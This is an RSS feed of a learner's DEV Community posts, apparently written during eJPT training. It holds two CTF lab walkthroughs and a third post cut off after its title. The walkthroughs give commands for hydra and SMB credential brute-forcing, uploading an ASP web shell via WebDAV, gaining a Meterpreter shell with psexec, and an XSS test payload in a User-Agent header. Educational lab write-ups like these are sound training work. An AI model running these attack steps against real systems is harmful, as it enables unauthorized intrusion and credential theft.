<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: James K.</title>
    <description>The latest articles on DEV Community by James K. (@james_kariuki).</description>
    <link>https://dev.to/james_kariuki</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3096985%2F34036677-f1ca-49cf-bfe8-7a671581f44b.jpg</url>
      <title>DEV Community: James K.</title>
      <link>https://dev.to/james_kariuki</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/james_kariuki"/>
    <language>en</language>
    <item>
      <title>Mastering Host &amp; Network Penetration Testing: A Windows CTF Walkthrough</title>
      <dc:creator>James K.</dc:creator>
      <pubDate>Wed, 18 Feb 2026 07:45:28 +0000</pubDate>
      <link>https://dev.to/james_kariuki/mastering-host-network-penetration-testing-a-windows-ctf-walkthrough-25o7</link>
      <guid>https://dev.to/james_kariuki/mastering-host-network-penetration-testing-a-windows-ctf-walkthrough-25o7</guid>
      <description>&lt;p&gt;Welcome back to what is turning into a series of articles documenting an aspiring pentester's journey in acquiring the required skills. This article documents how I solved the Host &amp;amp; Network Penetration Testing CTF, specifically the Windows-based target.&lt;/p&gt;

&lt;p&gt;The lab tested understanding of system- or host-based attacks, which exploit vulnerabilities in the configuration, software or hardware of a specific machine, often leading to compromise of the system through root or admin privilege escalation.&lt;br&gt;
The lab provided two target machines and useful wordlists to help capture the following four flags:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Flag 1&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;Hint: User 'bob' might not have chosen a strong password. Try common passwords to gain access to the server where the flag is located.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;My first step is usually basic host discovery and enumeration to find the open ports and services running on the target. A scan with &lt;code&gt;Nmap&lt;/code&gt; returned the following results:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3vpqz4qlgvoq3g1i60yg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3vpqz4qlgvoq3g1i60yg.png" alt="Nmap" width="800" height="433"&gt;&lt;/a&gt;&lt;/p&gt;
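
&lt;p&gt;For readers following along, a scan of this kind can be sketched as below. This is a minimal example rather than the exact command behind the screenshot, and &lt;code&gt;TARGET_IP&lt;/code&gt; is a placeholder for the lab target's address.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# -sV probes open ports for service versions, -sC runs the default NSE scripts
nmap -sV -sC TARGET_IP
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;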

&lt;p&gt;The results show a web server, specifically Microsoft IIS, running on port 80. Accessing it in a web browser prompts for a username and password. With the username provided in the hint, along with the suggestion of a weak password, a brute-force attack was the next step. Using &lt;code&gt;hydra&lt;/code&gt; together with the username and the provided password wordlist, I promptly cracked the weak password.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr4hocjhp6psv4f8j8x71.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr4hocjhp6psv4f8j8x71.png" alt="Hydra" width="800" height="80"&gt;&lt;/a&gt;&lt;/p&gt;
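
&lt;p&gt;A hedged sketch of this brute-force step, assuming the prompt is HTTP authentication on the site root. &lt;code&gt;passwords.txt&lt;/code&gt; stands in for the lab's password wordlist and &lt;code&gt;TARGET_IP&lt;/code&gt; for the target's address; neither name comes from the lab itself.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# -l sets a single username, -P a password wordlist;
# http-get attacks HTTP authentication on the given path
hydra -l bob -P passwords.txt TARGET_IP http-get /
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;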

&lt;p&gt;With valid credentials in hand, the next step was to find where the flag was located on the server. Scanning with &lt;code&gt;Dirb&lt;/code&gt; using those credentials revealed the following directories on the web server:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fey0a2x8to6oyykozucav.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fey0a2x8to6oyykozucav.png" alt="dirb" width="570" height="382"&gt;&lt;/a&gt;&lt;/p&gt;
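
&lt;p&gt;An authenticated scan like this one might look as follows. It is a sketch under assumptions: &lt;code&gt;TARGET_IP&lt;/code&gt; and &lt;code&gt;PASSWORD&lt;/code&gt; are placeholders, and with no wordlist argument dirb falls back to its default list.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# -u supplies username:password for HTTP authentication
dirb http://TARGET_IP -u bob:PASSWORD
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;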

&lt;p&gt;Navigating to the webdav directory in the browser revealed the first flag:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi4s3iiu8dwgs42g3ddbf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi4s3iiu8dwgs42g3ddbf.png" alt="flag1" width="631" height="325"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Flag 2&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;Hint: Valuable files are often on the C: drive. Explore it thoroughly.&lt;/strong&gt; &lt;/p&gt;

&lt;p&gt;The hint suggests the flag may be located on the C:\ drive. Since we already have initial access and know the target is running Microsoft IIS, the next step is to check whether we can exploit this to gain elevated privileges and view the files on the web server.&lt;br&gt;
I used the tool &lt;code&gt;Davtest&lt;/code&gt; to scan the web server and identify the file types that can be uploaded and executed on it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8lp5niudjcrkxlaou21z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8lp5niudjcrkxlaou21z.png" alt="Davtest" width="800" height="618"&gt;&lt;/a&gt;&lt;/p&gt;
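
&lt;p&gt;A minimal sketch of such a test, assuming the WebDAV directory sits at &lt;code&gt;/webdav&lt;/code&gt; as found in the directory scan. &lt;code&gt;TARGET_IP&lt;/code&gt; and &lt;code&gt;PASSWORD&lt;/code&gt; are placeholders.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# -auth passes the credentials, -url points at the WebDAV directory to test
davtest -auth bob:PASSWORD -url http://TARGET_IP/webdav
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;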

&lt;p&gt;The results show that the following file types can be executed: html, asp and txt. This means we can upload a malicious .asp file to the server and create a backdoor when the file is executed. Using the tool &lt;code&gt;Cadaver&lt;/code&gt; and the webshell.asp file provided in the lab environment, I uploaded the malicious file to the target.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjis4hcw1okdm69r415ma.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjis4hcw1okdm69r415ma.png" alt="Cadaver" width="654" height="290"&gt;&lt;/a&gt;&lt;/p&gt;
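
&lt;p&gt;The upload can be sketched roughly as below. The local path to the web shell is a placeholder, as is &lt;code&gt;TARGET_IP&lt;/code&gt;; the second command is typed inside cadaver's interactive session, not in the regular shell.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Open an interactive WebDAV session; cadaver prompts for the username and password
cadaver http://TARGET_IP/webdav
# Then, at the dav: prompt, upload the shell from its local path
put /path/to/webshell.asp
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;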

&lt;p&gt;We can access and execute the uploaded file via the web browser, which results in the page below, where a text box accepts Windows commands. Searching through the C:\ drive as suggested in the hint reveals the second flag, and it's read using the &lt;code&gt;type&lt;/code&gt; command.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs5u2y36wnxx34yoxki1t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs5u2y36wnxx34yoxki1t.png" alt="webshell" width="634" height="612"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Flag 3&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;Hint: By attempting to guess SMB user credentials, you may uncover important information that could lead you to the next flag.&lt;/strong&gt;&lt;br&gt;
The hint mentions guessing credentials, which means a brute force attack to try and obtain credentials to use for authentication. I used the Metasploit module &lt;code&gt;auxiliary/scanner/smb/smb_login&lt;/code&gt; to execute a brute force attack on the target and discovered the following credentials, which can be used for privilege escalation.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F068hfaik7gk7homszotw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F068hfaik7gk7homszotw.png" alt="smb_login" width="800" height="156"&gt;&lt;/a&gt;&lt;/p&gt;
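
&lt;p&gt;Run non-interactively, the module setup might look like the sketch below. &lt;code&gt;users.txt&lt;/code&gt; and &lt;code&gt;passwords.txt&lt;/code&gt; are placeholder names for the lab's wordlists, and &lt;code&gt;TARGET_IP&lt;/code&gt; is the target's address.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# -q skips the banner, -x runs the semicolon-separated console commands
msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set RHOSTS TARGET_IP; set USER_FILE users.txt; set PASS_FILE passwords.txt; set VERBOSE false; run"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Setting &lt;code&gt;VERBOSE&lt;/code&gt; to false keeps the output limited to successful logins.&lt;/p&gt;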

&lt;p&gt;I initially set the module's CreateSession option to true, used the session it opened to enumerate the shares, connected to the share and found the flag there. However, I was curious about another module I had learnt about, &lt;code&gt;psexec&lt;/code&gt;. Using the &lt;code&gt;exploit/windows/smb/psexec&lt;/code&gt; module, along with the admin credentials obtained in the previous step, I was able to obtain a meterpreter shell. Searching through the files and folders revealed the third flag.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz61af537icvojyg87a43.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz61af537icvojyg87a43.png" alt="flag3" width="800" height="629"&gt;&lt;/a&gt;&lt;/p&gt;
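
&lt;p&gt;A rough sketch of the psexec step, with &lt;code&gt;USERNAME&lt;/code&gt;, &lt;code&gt;PASSWORD&lt;/code&gt; and &lt;code&gt;TARGET_IP&lt;/code&gt; as placeholders for the values found earlier. Depending on the payload, &lt;code&gt;LHOST&lt;/code&gt; may also need to be set to the attacking machine's address so the shell can connect back.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# SMBUser and SMBPass carry the credentials recovered by smb_login
msfconsole -q -x "use exploit/windows/smb/psexec; set RHOSTS TARGET_IP; set SMBUser USERNAME; set SMBPass PASSWORD; run"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;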

&lt;p&gt;&lt;strong&gt;Flag 4&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;Hint: The Desktop directory might have what you're looking for. Enumerate its contents.&lt;/strong&gt;&lt;br&gt;
This flag was straightforward. Navigating to the Desktop folder reveals the last flag, completing the CTF.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58iyk4u5blieuhqmoryi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58iyk4u5blieuhqmoryi.png" alt="flag4" width="462" height="168"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;br&gt;
This lab was a great exercise in chaining vulnerabilities. We started with a simple web brute-force, pivoted to exploiting WebDAV misconfigurations for a shell, and finally used SMB brute-forcing to gain full system access. It highlights why strong passwords and disabling unused features (like WebDAV) are critical for system hardening.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;em&gt;Tools Used&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Nmap&lt;/strong&gt;: For initial host discovery and port scanning.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hydra&lt;/strong&gt;: For brute-forcing the web server's authentication prompt.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dirb&lt;/strong&gt;: For directory enumeration to find hidden web paths.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Davtest&lt;/strong&gt;: To scan the WebDAV server and identify allowed file uploads.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cadaver&lt;/strong&gt;: A command-line WebDAV client used to upload the malicious shell.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Metasploit Framework&lt;/strong&gt;:

&lt;ul&gt;
&lt;li&gt;auxiliary/scanner/smb/smb_login: Used for brute-forcing SMB credentials.&lt;/li&gt;
&lt;li&gt;exploit/windows/smb/psexec: Used to gain a Meterpreter shell.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;p&gt;Thanks for following along, and stay tuned for the next article!&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>security</category>
    </item>
    <item>
      <title>eJPT Lab Walkthrough: Vulnerability Assessment</title>
      <dc:creator>James K.</dc:creator>
      <pubDate>Mon, 19 Jan 2026 08:24:55 +0000</pubDate>
      <link>https://dev.to/james_kariuki/ejpt-lab-walkthrough-vulnerability-assessment-5cg0</link>
      <guid>https://dev.to/james_kariuki/ejpt-lab-walkthrough-vulnerability-assessment-5cg0</guid>
      <description>&lt;p&gt;Hello or hello again, depending on whether or not you've encountered one of my previous articles. I've been documenting my progress learning pentesting and trying to earn the eJPT certification, specifically my process of solving the CTF challenges throughout the course. &lt;br&gt;
This challenge was designed to test knowledge and skills in vulnerability assessment and identifying hidden information on a target web server.&lt;br&gt;
It involved tools like Nmap to discover open ports and services, as well as platforms like Nessus to detect misconfigurations, outdated software and potential vulnerabilities. Such an assessment helps in understanding the security posture of the target environment and gives insight into exploitable weaknesses that attackers might leverage, which helps not only to discover hidden threats but also to develop strategies to mitigate them effectively.&lt;/p&gt;

&lt;h3&gt;
  
  
  Flag 1
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Hint: Explore hidden directories for version control artifacts that may reveal valuable info.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;After a quick ping and an initial nmap scan confirmed that the target was reachable, a simple nmap port scan revealed the following open ports:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffwqte245iqgy93r2416z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffwqte245iqgy93r2416z.png" alt="Nmap" width="800" height="302"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The hint mentioned version control, which points to artifacts such as an exposed &lt;code&gt;.git&lt;/code&gt; directory. Heading to the URL containing the git repo reveals the first flag.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fixtcyoamqbbn063arsgh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fixtcyoamqbbn063arsgh.png" alt="Flag1" width="504" height="570"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The first flag is found in the &lt;code&gt;flag.txt&lt;/code&gt; file.&lt;/p&gt;

&lt;h3&gt;
  
  
  Flag 2
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Hint: The data storage has some loose security measures. Can you find the flag hidden within it?&lt;/strong&gt;&lt;br&gt;
The hint suggests that the database, identified from the scans as a &lt;code&gt;mysql&lt;/code&gt; database (&lt;code&gt;Version: 5.5.47-0&lt;/code&gt;, to be specific), has weak security measures. Further enumeration using Nmap NSE scripts revealed that the target was configured to block connection attempts, which also ruled out a brute-force attack. The nmap results, however, listed some interesting directories that were easily accessible. The one most relevant to the database was &lt;code&gt;/phpmyadmin&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fupxjpmsh97prma110ist.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fupxjpmsh97prma110ist.png" alt="nmap2" width="800" height="421"&gt;&lt;/a&gt;&lt;/p&gt;
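
&lt;p&gt;The NSE scripts used are only visible in the screenshot, so the following is a sketch of the kind of enumeration described, not a record of the exact commands. It assumes the web server and MySQL listen on their default ports (80 and 3306), with &lt;code&gt;TARGET_IP&lt;/code&gt; as a placeholder.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# http-enum probes for well-known web paths such as admin panels
nmap -p 80 --script http-enum TARGET_IP
# mysql-info reads the server banner; mysql-empty-password checks
# for root or anonymous logins with an empty password
nmap -p 3306 --script mysql-info,mysql-empty-password TARGET_IP
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;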

&lt;p&gt;The webpage reveals some databases, including mysql. &lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvm8uyd7k3crwix9lxh8w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvm8uyd7k3crwix9lxh8w.png" alt="phpadmin" width="800" height="410"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Further enumeration of the database reveals a table called &lt;code&gt;secret_info&lt;/code&gt;, in which the second flag is found.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0azb5ilqjhy26zmp5yvw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0azb5ilqjhy26zmp5yvw.png" alt="Flag2" width="800" height="428"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Flag 3
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Hint: A PHP file that displays server information might be worth examining. What could be hidden in plain sight?&lt;/strong&gt;&lt;br&gt;
A quick search revealed that the file that displays PHP server info is likely to be &lt;code&gt;phpinfo.php&lt;/code&gt;. The nmap results from the previous step showed that the file exists and possibly contains useful information. Navigating to it in the browser displays the page.&lt;/p&gt;

&lt;p&gt;Scanning through the PHP server information page reveals the third flag in the configuration section:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff4ec4gjm33lo627oqvbt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff4ec4gjm33lo627oqvbt.png" alt="Flag3" width="625" height="348"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Flag 4
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Hint: Sensitive directories might hold critical information. Search through carefully for hidden gems.&lt;/strong&gt;&lt;br&gt;
Following the hint, a more focused review of the dirb scan results from the previous step showed that the directory that immediately stood out was the passwords directory. Further enumeration of the directory revealed the files below, one being the final flag.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1wg54414bgts2te0wzc8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1wg54414bgts2te0wzc8.png" alt="Flag4" width="515" height="294"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Even though the lab was finished, I was still curious about what Nessus had to offer. Using the provided credentials to access the dashboard, I carried out a basic network scan after discovering the target host, and found 24 vulnerabilities in total, only one of which was rated medium severity:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr4t4bzehw8tzvjpu0zeu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr4t4bzehw8tzvjpu0zeu.png" alt="Nessus" width="800" height="429"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Further research revealed that the specific CVEs were CVE-2020-11022 and CVE-2020-11023. I set out to confirm that the target was indeed vulnerable.&lt;br&gt;
Using Burp Suite to inspect the requests and responses for a point from which to execute the XSS attack, I found some interesting comments that provided the needed info. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1yhhimih2wsxqftlcxi4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1yhhimih2wsxqftlcxi4.png" alt="xss" width="800" height="332"&gt;&lt;/a&gt;&lt;br&gt;
The vulnerable header was &lt;code&gt;User-Agent&lt;/code&gt;. Using the proxy to intercept and modify the request with the simple test script &lt;code&gt;&amp;lt;script&amp;gt;alert("XSS-Test")&amp;lt;/script&amp;gt;&lt;/code&gt; confirmed that the target was vulnerable.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6z0vq1bjz972mk3k6qop.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6z0vq1bjz972mk3k6qop.png" alt="xsstest" width="800" height="418"&gt;&lt;/a&gt;&lt;/p&gt;
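
&lt;p&gt;Outside of a proxy, a quick reflection check can be sketched with curl. This assumes the header is echoed on the site root, which is a guess; &lt;code&gt;TARGET_IP&lt;/code&gt; is a placeholder. A match only shows that the header value comes back somewhere in the response, so loading the page in a browser is still needed to confirm that the script actually runs.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# -A sets the User-Agent header; grep -F looks for the literal marker in the response body
curl -s -A '&amp;lt;script&amp;gt;alert("XSS-Test")&amp;lt;/script&amp;gt;' http://TARGET_IP/ | grep -F 'XSS-Test'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;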

&lt;p&gt;To wrap things up, this lab really put my vulnerability assessment skills to the test, particularly the second flag. The lab also highlights that tools aren't everything, and that manual investigation is key to finding the hidden stuff that automated scans might miss.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>security</category>
    </item>
    <item>
      <title>Cracking the Shell: Enumerating SMB and SSH in the INE Skill Check Lab</title>
      <dc:creator>James K.</dc:creator>
      <pubDate>Sun, 04 Jan 2026 12:42:30 +0000</pubDate>
      <link>https://dev.to/james_kariuki/cracking-the-shell-enumerating-smb-and-ssh-in-the-ine-skill-check-lab-4jj4</link>
      <guid>https://dev.to/james_kariuki/cracking-the-shell-enumerating-smb-and-ssh-in-the-ine-skill-check-lab-4jj4</guid>
